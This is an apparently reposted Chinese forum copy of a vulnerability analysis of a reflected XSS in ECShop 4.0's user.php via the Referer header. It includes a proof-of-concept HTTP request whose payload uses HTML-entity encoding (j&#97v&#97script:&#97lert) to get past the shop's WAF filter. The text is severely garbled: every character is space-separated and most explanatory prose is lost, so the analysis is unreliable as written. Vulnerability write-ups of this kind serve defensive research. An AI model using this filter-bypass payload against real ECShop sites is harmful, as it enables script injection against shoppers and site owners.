[13905] 2019-03-24_ECShop4.0反射型XSS漏洞分析

文档创建者:s7ckTeam
浏览次数:16
最后更新:2025-01-18
2019-03-24_ECShop4.0反射型XSS漏洞分析 E C S h o p   4 . 0 X S S C y c 1 i n g   F r e e B u f   2 0 1 9 - 0 3 - 2 4   E c s h o p 广 广 4 . 0 . 0 f i l t e r X S S G E T X S S E C S h o p 4 . 0 . 0 X S S p h p 5 . 6 . 2 7 +   A p a c h e   +   M y s q l X S S u s e r . p h p u s e r . p h p 3 2 8 $ a c t i o n l o g i n $ b a c k _ a c t R E F E R E R R E F E R E R $ b a c k _ a c t $ b a c k _ a c t a s s i g n $ s m a r t y c l s _ t e m p l a t e / i n c l u d e s / i n i t . p h p 1 7 0 G E T / C M S / E C S h o p _ V 4 . 0 . / u s e r . p h p   H T T P / 1 . 1 R e f e r e r : h t t p s : / / 1 2 7 . 0 . 0 . 1 "   / > < a   h r e f = j & # 9 7 v & # 9 7 s c r i p t : & # 9 7 l e r t ( ' C y c 1 e _ t e s t ' ) > < i m g s r c = " x x x x x U s e r - A g e n t : M o z i l l a / 5 . 0   ( W i n d o w s   N T   6 . 1 ;   W O W 6 4 )   A p p l e W e b K i t / 5 3 7 . 2 1   ( K H T M L ,   l i k e   G e c k o ) C h r o m e / 4 1 . 0 . 2 2 2 8 . 0   S a f a r i / 5 3 7 . 2 1 C o o k i e : E C S _ I D = 1 7 b 6 0 8 d 2 a 6 7 9 c f 2 c 7 e 8 6 1 1 5 8 1 4 7 8 e 6 9 2 9 d b f b 3 4 b ; E C S [ v i s i t _ t i m e s ] = 2 C o n n e c t i o n : k e e p - a l i v e A c c e p t :   * / * A c c e p t - E n c o d i n g : g z i p , d e f l a t e H o s t :   1 2 7 . 0 . 0 . 1 R e f e r e r : h t t p s : / / 1 2 7 . 0 . 0 . 1 "   / > < a h r e f = j & # 9 7 v & # 9 7 s c r i p t : & # 9 7 l e r t ( ' C y c 1 e _ t e s t ' ) > < i m g s r c = " x x x x x
a s s i g n c l s _ t e m p l a t e / i n c l u d e s /   c l s _ t e m p l a t e . p h p 7 0 $ b a c k _ a c t u s e r . p h p d i s p l a y / i n c l u d e s /   c l s _ t e m p l a t e . p h p 1 0 0 f e t c h u s e r _ p a s s p o r t . d w t u s e r _ p a s s p o r t . d w t
$ b a c k _ a c t i n p u t v a l u e , $ b a c k _ a c t 便 h t m l j s W a f X S S E c s h o p / i n c l u d e s / s a f e t y . p h p o n [ a - z A - Z ] { 3 , 1 5 }   o n j s < s c r i p t a l e r t e v a l d a t a J a v a s c r i p t $ b a c k _ a c t 便 f i l t e r ( ) p r e g _ m a t c h / i j s c o n f i r m H T M L   H T M L   使 < >   H T M L   使 <     < <   便 < H T M L   < > a - z A - Z H T M L & # [ A C C I I ] a - > & # 9 7
P O C j & # 9 7 v & # 9 7 s c r i p t : & # 9 7 l e r t ( C y c 1 e _ t e s t ) x s s h t m l h t m l j a v a s c r i p t : a l e r t ( C y c 1 e _ t e s t ) * C y c 1 i n g F r e e B u f R e f e r e r :   [ h t t p s : / / 1 2 7 . 0 . 0 . 1 ] ( h t t p s : / / 1 2 7 . 0 . 0 . 1 ) " / > < a   h r e f = j & # 9 7 v & # 9 7 s c r i p t : & # 9 7 l e r t ( ' C y c 1 e _ t e s t ' ) > < i m g s r c = " x x x x x

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则